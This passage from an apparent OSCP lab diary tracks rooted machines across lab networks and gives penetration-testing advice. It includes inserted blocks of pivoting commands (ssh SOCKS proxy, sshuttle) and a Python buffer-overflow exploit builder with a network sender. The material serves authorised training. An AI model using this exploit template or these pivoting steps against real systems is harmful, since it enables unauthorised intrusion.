
I got tired trying to compromise a machine on the IT network and went to bed without a root today. It was so frustrating; it's been a while since I was up against the wall. If I have any advice to give you: don't assume anything, test it, K.I.S.S. Still 34 root accesses, 10 days left. I deduced this number from the organization of the forum, where 63 machines seem to be referenced. There may be secret machines, but it gives you an idea of the number of targets! I'm missing at least 29 in 10 days. 3 per day… Challenge accepted, let's go!
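The two pivoting options mentioned above, side by side, as an added example that is not from the original post. The pivot user, pivot host and target subnet are placeholders (assumptions), and which python version the pivot needs depends on the sshuttle release you run. The script only prints the commands unless DRY_RUN=0; the preflight check that looks for a python interpreter on the pivot is the "don't assume anything, test it" part and needs real SSH access.

```shell
#!/bin/sh
# Added example: pivoting into a second network through a compromised host.
# PIVOT_USER / PIVOT_HOST / TARGET_NET are placeholders, not lab values.
PIVOT_USER="${PIVOT_USER:-user}"
PIVOT_HOST="${PIVOT_HOST:-10.11.1.5}"
TARGET_NET="${TARGET_NET:-10.1.1.0/24}"

# Option A: SOCKS proxy via ssh -D plus proxychains.
# Every connection is proxied one by one (slow scans), only TCP connect
# scans work (-sT), ping/UDP do not. Needs "socks5 127.0.0.1 1080" in
# /etc/proxychains.conf.
proxychains_cmds() {
    printf 'ssh -f -N -D 1080 %s@%s\n' "$PIVOT_USER" "$PIVOT_HOST"
    printf 'proxychains nmap -sT -Pn --top-ports 100 %s\n' "$TARGET_NET"
}

# Option B: sshuttle. Routes the whole subnet transparently through the
# pivot, so plain nmap/exploits work unchanged. Requires python on the
# pivot; $1 is the interpreter path to pass with --python when it is not
# in the pivot's PATH (empty = rely on PATH).
sshuttle_cmd() {
    if [ -n "$1" ]; then
        printf 'sshuttle -r %s@%s --python %s %s\n' \
            "$PIVOT_USER" "$PIVOT_HOST" "$1" "$TARGET_NET"
    else
        printf 'sshuttle -r %s@%s %s\n' "$PIVOT_USER" "$PIVOT_HOST" "$TARGET_NET"
    fi
}

# Preflight: locate a python interpreter on the pivot before trusting
# sshuttle. Prints the first path found, nothing if none. Needs network.
pivot_python_path() {
    ssh "$PIVOT_USER@$PIVOT_HOST" \
        'command -v python || command -v python2 || command -v python3 || ls /usr/bin/python* 2>/dev/null | head -n 1' \
        2>/dev/null
}

if [ "${DRY_RUN:-1}" = "1" ]; then
    proxychains_cmds
    sshuttle_cmd ""                       # python in PATH on the pivot
    sshuttle_cmd "/usr/local/bin/python2" # python only at a known path
else
    py=$(pivot_python_path)
    [ -n "$py" ] || { echo "no python on pivot, fall back to proxychains" >&2; exit 1; }
    sh -c "$(sshuttle_cmd "$py")"
fi
```

If the preflight prints nothing, sshuttle cannot run its server side and proxychains remains the way in, which is the "it won't work every time" case.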

Day 21

On August 18, while investigating the IT network, I noticed that several machines had an interface on the public network! My initial estimate of 63 machines to compromise therefore goes down! But to keep things simple, and to avoid recounting the actual number of distinct machines right now, I will simply increase my number of rooted machines: some hidden targets may remain and I'm not sure my count is right, so I add these to the root count. 34 machines as root => 37 roots. I will then focus on the remaining IT targets! The rest of the day I struggled with the constraints of the network; I had to think harder about how to trigger, transmit and receive my exploits while pivoting.. A particularly horrible machine for pivoting with MSF is "Niky".. No root today..

Day 22

On August 19, I met an administrative machine.. I have a webshell on it; it was almost too beautiful, and I discovered that I was not able to do more than that in the current state.. So I went to other machines, scanning this new network again and again.. I've been here all day. I haven't had a root access for 2 days, it's getting frustrating.. I decided to learn how to pwn, to develop exploits (I'm not used to pwn, so yes, it's not a fun part).. After that I got root on 2 machines: 39 roots, 8 days from the end.

Day 23

On August 20, I start my last 8 days. I worked all day on Niky; it was crazy to configure all the routing to make it work! Finally I managed it, and I got root on Niky shortly after! 40 roots \o/ This is the first machine I've met that has a foot in the dev network, but I can't unlock it yet or scan it easily through Niky. By the way, Niky is also part of the dev network and had been counted as +1, so it should be considered another root => 41. 22 machines left for 7 days.

Day 27

August 24. Ok, from August 21 to 24 I totally abandoned this thoughts record.. I wasn't in a good mood, personal problems.. I didn't work at all on one of those days either. So I don't know exactly what I did on those days, but the main thing is that I'm in the administration network now! I compromised 2 out of 4 administration machines, discovered a hidden one, and that's it. I'm going to count exactly how many machines I have root access on, I mean the real number, without counting dual-interface machines twice.

Public:

  • 44 machines discovered ;

  • 1 of them isn't intended to be vulnerable: it's the firewall which links to the other networks ;

  • 3 are duplicated since they are popular ;

  • As a result => 40 different machines intended to be compromised ;

  • Rooted 34 out of 40 ;

  • 6 machines remain (Sufferance included, the last of the big 5 => Humble, Pain, Sufferance, Gh0st, FC4).

IT:

  • 11 machines discovered ;

  • 1 of them isn't intended to be vulnerable, the firewall again ;

  • 5 machines have an interface linked to the public network, compromised in public ;

  • As a result => 5 different machines intended to be compromised ;

  • Rooted 2 out of the 5; one of the remaining ones leads to the admin network (which I have accessed, but the machine's role is really weird and I have no starting point to compromise it) ;

  • 3 out of 5 remain.

Dev:

  • Not discovered yet, I can't say anything about it.

Admin:

  • 5 machines discovered ;

  • Not sure whether any of them is not intended to be vulnerable; officially there are 4 machines, but in fact I found another one, and since I'm not sure about its role, I'm counting it ;

  • As a result => 5 different machines intended to be compromised ;

  • Rooted 2 out of 5; I have a simple shell on one of the remaining ones and still have to do the privilege escalation (hard time) ;

  • 3 out of 5 remain.

Total:

  • 60 machines discovered ;

  • 2 machines aren’t intended to be vulnerable ;

  • 8 are, or are considered, duplicates ;

  • As a result => 50 different machines intended to be compromised in the Public/IT/Admin networks ;

  • Rooted 40 out of 50 ;

  • 10 machines remain in Public/IT/Admin ;

  • Still have to discover the Dev network from one of those machines ;

  • 4 days remaining, to be exact, 91 hours 20 minutes.

Some thoughts:

Even if there are duplicates or machines that are not intended to be vulnerable, you will always be tempted to try them anyway. I spent more than 15 hours on machines that I thought were meant to be compromised! Then I read the "rules" and understood that I wasn't supposed to compromise them.. Machines that are duplicates will also eat part of your time: you must first realize that you have already compromised them and that they are duplicates.. So you will eventually run some network scans and try several approaches before you notice; keep in mind that they are time consuming! You can always try to compromise those machines in a different way, but my advice is to move on to the ones you have not yet compromised. You still have a lot to discover!

You also have no idea where you're going to find the key to another network! I got access to the IT network 5 times, once to the admin network (the only way, I think), while I still have no lead on the dev network!

Post-exploitation takes a lot of time to be done well. I saw many people in the forum discussions complaining that they had compromised XX machines but could not get the machines that depend on others they had already compromised.. At that point you don't know where you missed the information; are you going to waste your time redoing post-exploitation everywhere? No, of course not, you ask for help in the forums ;) So do your post-exploitation properly, take the time, it's really important and it will open the doors of many machines to you. My average time spent in post-exploitation is 1h30-2h; I once spent 10 hours on a single machine, it was one of my first and it was a critical machine.. I learned tons, which is also why I can do post-exploitation more quickly now while being confident that I'm doing it well..

I heard that the pwn is a simple buffer overflow, easy as f**k. I'm not the guy who's confident about it. Moreover, even if sometimes it's just that, you'll find that the complexity is in the context, and you'll still have to fight to get it. It is a question of methodology, effort, patience, effort. In other words: methodology, enumerate, enumerate, enumerate, enumerate, rerun, think about a plan, no it won't work, no, no, no, no, no, no, no, no, no, 0x9090909090, enumerate, 0x909090909090, rest, enumerate, enumerate, enumerate, win.
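The Day 8 entry and the paragraph above both describe the same job: taking a known stack overflow and re-deriving the target-specific parts (offset, bad characters, return address, NOP sled) for the service in front of you. The following is an added example, not code from the original post; it re-implements what msf-pattern_create and msf-pattern_offset do, and wraps the payload assembly so the "0x90" and "no, no, no" steps are explicit. The target host, port, return address and shellcode in the usage section are placeholders (assumptions).

```python
"""Added example: the per-target pieces of a classic stack overflow exploit.
Not from the original post; host/port/ret address/shellcode are placeholders."""
import socket
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Cyclic, non-repeating pattern (Aa0Aa1Aa2...), unique up to 20280 bytes,
    same scheme as msf-pattern_create. Send it at the crash length so the
    value that lands in EIP identifies where in the buffer EIP was overwritten."""
    out = bytearray()
    for u in ascii_uppercase:
        for lo in ascii_lowercase:
            for d in digits:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length must be <= 20280 to stay unique")


def pattern_offset(eip, length: int = 20280) -> int:
    """Offset of the 4 bytes that ended up in EIP.

    `eip` is either the int the debugger shows (x86 is little-endian, so
    EIP=0x41326141 came from the bytes b"Aa2A") or those 4 raw bytes."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern (wrong length, or EIP corrupted)")
    return idx


def badchar_probe(exclude=(0x00,)) -> bytes:
    """Every byte value except those already known to be bad. Sent right after
    the offset, then compared against memory in the debugger: any byte that is
    missing or mangled is a bad char and must be excluded from the shellcode."""
    return bytes(b for b in range(256) if b not in exclude)


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_len: int = 16, bad=(0x00,), total=None) -> bytes:
    """filler | return address (little-endian) | NOP sled | shellcode [| padding].

    The return address is typically a JMP ESP in a non-ASLR module; the NOP
    sled absorbs small differences in where ESP points on the target."""
    for b in struct.pack("<I", ret_addr) + shellcode:
        if b in bad:
            raise ValueError(f"bad char 0x{b:02x} in return address or shellcode")
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode
    if total is not None:
        if len(payload) > total:
            raise ValueError("payload longer than the crash length that was tested")
        payload += b"C" * (total - len(payload))  # keep the crash geometry identical
    return payload


def send_payload(host: str, port: int, prefix: bytes, payload: bytes, timeout: float = 5.0) -> None:
    """Deliver prefix+payload to the service; `prefix` is whatever the protocol
    expects before the overflowing argument (e.g. b"USER ")."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    crash_len = 2000                       # length found by fuzzing (assumed)
    eip_seen = 0x41326141                  # value read in the debugger (assumed)
    off = pattern_offset(eip_seen, crash_len)
    bad = (0x00, 0x0a, 0x0d)               # found with badchar_probe() (assumed)
    shellcode = b"\xcc" * 32               # placeholder; use msfvenom -b for the real one
    payload = build_payload(off, 0x0804c0de, shellcode, bad=bad, total=crash_len)
    print(f"offset={off} payload={len(payload)} bytes")
    # send_payload("10.11.1.1", 9999, b"", payload)   # assumed target, not run here
```

The order matters: the offset and the bad characters must be confirmed on the actual target before the return address and shellcode are chosen, which is where the repeated "enumerate, rerun" comes from.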

I'm 26 days in. I know I'm much better than I was 26 days ago, but I don't know if I'm ready for the exam (October 6 at 3am). Still, I'm going to try hard again as usual, and yes, trust me, I know the meaning of those words!

Day 28

On August 25, 4 root accesses since yesterday. I found some changes, but I also discovered the DEV network! So here is a small update of the count:

Public:

  • 44 machines discovered ;

  • 1 of them isn't intended to be vulnerable: it's the firewall which links to the other networks ;

  • 3 are duplicated since they are popular ;

  • As a result => 40 different machines intended to be compromised ;

  • Rooted 36 out of 40 ;

  • 4 machines remain (Sufferance included, the last of the big 5 => Humble, Pain, Sufferance, Gh0st, FC4).

IT:

  • 11 machines discovered ;

  • 1 of them isn't intended to be vulnerable, the firewall again ;

  • 5 machines have an interface linked to the public network, compromised in public ;

  • As a result => 5 different machines intended to be compromised ;

  • Rooted 2 out of 5; one of the remaining ones leads to the admin network (which I have accessed, but the machine's role is really weird and I have no starting point to compromise it) ;

  • 3 out of 5 remain.

Dev:

  • 7 machines discovered ;

  • 1 of them isn't intended to be vulnerable, again the firewall ;

  • 1 machine has a link to the IT network (that one I've compromised, at least..) ;

  • As a result => 5 different machines intended to be compromised ;

  • Rooted 1 out of 5 ;

  • 4 out of 5 remain.

Admin:

  • 5 machines discovered ;

  • Officially there are 4 machines; in fact I found another one, but since I'm not sure about its role I'm not counting it: it doesn't show any open ports despite all my attempts, and it is referenced as the DNS server by all 4 machines ;

  • As a result => I'm going to assume there are 4 different machines intended to be compromised ;

  • Rooted 3 out of 4 ;

  • 1 out of 4 remains.

Total:

  • 67 machines discovered ;

  • 4 machines aren’t intended to be vulnerable ;

  • 9 are, or are considered, duplicates ;

  • As a result => 54 different machines intended to be compromised in Public/Dev/IT/Admin ;

  • Rooted 42 out of 54 ;

  • 12 machines remain in Public/Dev/IT/Admin ;

  • 2 days remaining.

Day 29

August 26, today I almost compromised a machine that wasn't supposed to be.. but the main achievement of the day is that I finished Jack, which means I have compromised the entire administration network!

Day 30

August 27, it's my last day. I unlocked all the networks, finished the Admin one, got Humble, Pain, Gh0st and FC4.. but I'm still missing Sufferance. I'll do my best on this one to get it :)

Sufferance is still not falling.. 1h30 before the end, I'm bruteforcing my way in. I really think it's the right way, but I don't know if I'm betting on the right horse.. I won't have time to try again; this solution seems the most legitimate to me.. So we'll see: if I get access, I'll need to get the root shell very quickly! Unfortunately, I couldn't get in; I must have bet on the wrong horse!

I salute the courage of the survivors!

I also had the opportunity to do a talk about the OSCP :)

OSCP - Say goodbye to everyone you've ever met

Sadly, I spoke French, but you can still get the presentation as a PDF here:

PDF

OSCP useful resources and tools